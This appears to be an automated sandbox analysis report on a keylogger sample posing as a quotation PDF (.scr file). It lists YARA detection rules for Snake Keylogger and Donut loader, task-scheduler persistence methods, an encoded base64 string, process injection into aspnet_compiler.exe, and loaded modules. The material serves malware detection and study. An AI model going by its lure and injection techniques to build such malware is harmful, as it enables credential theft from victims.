Source: 4.2.aspnet_compiler.exe.25893a30000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.25893a30000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.aspnet_compiler.exe.25893a30000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.aspnet_compiler.exe.25893a30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.3366738484.00000258936F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2622093932.0000021FA370A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: aspnet_compiler.exe PID: 2928, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 2928, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, -.cs

Base64 encoded string: 'Q7dsBc+qPpx6F8aic7p2HsTpUb1sFMelfLckNs+zVaBrA9OGY716HMirafV4FN6YVrtzHeSmfaskHtqYWaB6AN+mfKdrCJGgdbpAPc+pd7p3Su2iZJpmAc+BYqFyOcupdKJ6Ss2iZJFREMeiK4dxFc+/X6gkI8+mdJ1rA8Opd/VeFc78d6trLvqoY6drGMWpK6l6BfWEZbxtFMSzVKFyEMOpK516Be6mZK8kQ5/+KP0kMNm0daN9HdOUdbxpFNj8Q6dyAcaiUb1sFMelfLdaCdqrf7x6A5Glcax6HdyqK71yHsGiZKtsBQ=='

Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@4/3

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT TOP 0 * FROM {0};
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE ROWID = last_insert_rowid();
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000000.2115283235.0000021FA1592000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: SELECT @countGroupBy AS [countGroupBy], @count AS [count]PDELETE FROM @(Model.TemporaryTableName);RDELETE FROM @@(Model.TemporaryTableName);
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Deleted' AS "$action", @(Model.PreOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);DELETE FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT PK_@(Model.TemporaryTableNamePK) PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) CONSTRAINT [PK_@(Model.TemporaryTableNamePK)] PRIMARY KEY CLUSTERED ( ZZZ_Index ASC) );
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000000.2115283235.0000021FA1592000.00000002.00000001.01000000.00000003.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoinMerge)) OR ROWID = last_insert_rowid();
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT TOP 0 @(Model.TemporaryColumnNames) INTO @(Model.TemporaryTableName) FROM (SELECT 1 AS ZZZ_Index) AS A LEFT JOIN @(Model.DestinationTableName) AS B ON 1 = 2;
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE @(Model.PrimaryKeyStagingJoin);
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000000.2115283235.0000021FA1592000.00000002.00000001.01000000.00000003.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE @(Model.DestinationTableName) SET @(Model.UpdateSetStagingNames) WHERE @(Model.PrimaryKeyStagingJoin);
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000000.2115283235.0000021FA1592000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO @(Model.DestinationTableName) ( @(Model.InsertColumnNames) ) VALUES ( @(Model.InsertStagingNames) );
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000000.2115283235.0000021FA1592000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE @(Model.TemporaryTableName) ( @(Model.TemporaryTableColumnCreate) );
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT @(Model.ZZZ_Index) AS ZZZ_Index, 'Inserted' AS "$action", @(Model.PostOutput) FROM @(Model.DestinationTableName) WHERE (@(Model.PrimaryKeyStagingJoin)) OR ROWID = last_insert_rowid();
Source: aspnet_compiler.exe, 00000004.00000002.3368058853.000002589576B000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.000002589575E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3371390790.00000258A54F7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895712000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895721000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3368058853.0000025895730000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA32C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT * FROM {0} LIMIT 0;

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe"
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
